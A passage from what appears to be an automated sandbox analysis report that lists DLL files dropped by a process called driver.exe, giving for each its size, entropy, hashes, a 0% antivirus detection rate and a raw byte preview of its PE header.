                                                                                                                                                                                                                                              SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                                                                                                                                                                              SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.625331165566263
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
                                                                                                                                                                                                                                              MD5:E89CDCD4D95CDA04E4ABBA8193A5B492
                                                                                                                                                                                                                                              SHA1:5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
                                                                                                                                                                                                                                              SHA-256:1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
                                                                                                                                                                                                                                              SHA-512:55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.737397647066978
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
                                                                                                                                                                                                                                              MD5:ACCC640D1B06FB8552FE02F823126FF5
                                                                                                                                                                                                                                              SHA1:82CCC763D62660BFA8B8A09E566120D469F6AB67
                                                                                                                                                                                                                                              SHA-256:332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
                                                                                                                                                                                                                                              SHA-512:6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.6569647133331316
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
                                                                                                                                                                                                                                              MD5:C6024CC04201312F7688A021D25B056D
                                                                                                                                                                                                                                              SHA1:48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
                                                                                                                                                                                                                                              SHA-256:8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
                                                                                                                                                                                                                                              SHA-512:D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.882042129450427
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
                                                                                                                                                                                                                                              MD5:1F2A00E72BC8FA2BD887BDB651ED6DE5
                                                                                                                                                                                                                                              SHA1:04D92E41CE002251CC09C297CF2B38C4263709EA
                                                                                                                                                                                                                                              SHA-256:9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
                                                                                                                                                                                                                                              SHA-512:8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):5.355894399765837
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
                                                                                                                                                                                                                                              MD5:724223109E49CB01D61D63A8BE926B8F
                                                                                                                                                                                                                                              SHA1:072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
                                                                                                                                                                                                                                              SHA-256:4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
                                                                                                                                                                                                                                              SHA-512:19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.771309314175772
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
                                                                                                                                                                                                                                              MD5:3C38AAC78B7CE7F94F4916372800E242
                                                                                                                                                                                                                                              SHA1:C793186BCF8FDB55A1B74568102B4E073F6971D6
                                                                                                                                                                                                                                              SHA-256:3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
                                                                                                                                                                                                                                              SHA-512:C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.7115212149950185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
                                                                                                                                                                                                                                              MD5:321A3CA50E80795018D55A19BF799197
                                                                                                                                                                                                                                              SHA1:DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
                                                                                                                                                                                                                                              SHA-256:5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
                                                                                                                                                                                                                                              SHA-512:3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.893761152454321
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
                                                                                                                                                                                                                                              MD5:0462E22F779295446CD0B63E61142CA5
                                                                                                                                                                                                                                              SHA1:616A325CD5B0971821571B880907CE1B181126AE
                                                                                                                                                                                                                                              SHA-256:0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
                                                                                                                                                                                                                                              SHA-512:07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):5.231196901820079
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
                                                                                                                                                                                                                                              MD5:C3632083B312C184CBDD96551FED5519
                                                                                                                                                                                                                                              SHA1:A93E8E0AF42A144009727D2DECB337F963A9312E
                                                                                                                                                                                                                                              SHA-256:BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
                                                                                                                                                                                                                                              SHA-512:8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.799245167892134
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
                                                                                                                                                                                                                                              MD5:517EB9E2CB671AE49F99173D7F7CE43F
                                                                                                                                                                                                                                              SHA1:4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
                                                                                                                                                                                                                                              SHA-256:57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
                                                                                                                                                                                                                                              SHA-512:492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.587063911311469
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
                                                                                                                                                                                                                                              MD5:F3FF2D544F5CD9E66BFB8D170B661673
                                                                                                                                                                                                                                              SHA1:9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
                                                                                                                                                                                                                                              SHA-256:E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
                                                                                                                                                                                                                                              SHA-512:184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.754374422741657
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
                                                                                                                                                                                                                                              MD5:A0C2DBE0F5E18D1ADD0D1BA22580893B
                                                                                                                                                                                                                                              SHA1:29624DF37151905467A223486500ED75617A1DFD
                                                                                                                                                                                                                                              SHA-256:3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
                                                                                                                                                                                                                                              SHA-512:3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.664553499673792
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
                                                                                                                                                                                                                                              MD5:2666581584BA60D48716420A6080ABDA
                                                                                                                                                                                                                                              SHA1:C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
                                                                                                                                                                                                                                              SHA-256:27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
                                                                                                                                                                                                                                              SHA-512:BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                              MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                              SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                              SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                              SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.834520503429805
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
                                                                                                                                                                                                                                              MD5:1281E9D1750431D2FE3B480A8175D45C
                                                                                                                                                                                                                                              SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
                                                                                                                                                                                                                                              SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
                                                                                                                                                                                                                                              SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.916367637528538
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
                                                                                                                                                                                                                                              MD5:FD46C3F6361E79B8616F56B22D935A53
                                                                                                                                                                                                                                              SHA1:107F488AD966633579D8EC5EB1919541F07532CE
                                                                                                                                                                                                                                              SHA-256:0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
                                                                                                                                                                                                                                              SHA-512:3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.829681745003914
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
                                                                                                                                                                                                                                              MD5:D12403EE11359259BA2B0706E5E5111C
                                                                                                                                                                                                                                              SHA1:03CC7827A30FD1DEE38665C0CC993B4B533AC138
                                                                                                                                                                                                                                              SHA-256:F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
                                                                                                                                                                                                                                              SHA-512:9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.612408827336625
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
                                                                                                                                                                                                                                              MD5:0F129611A4F1E7752F3671C9AA6EA736
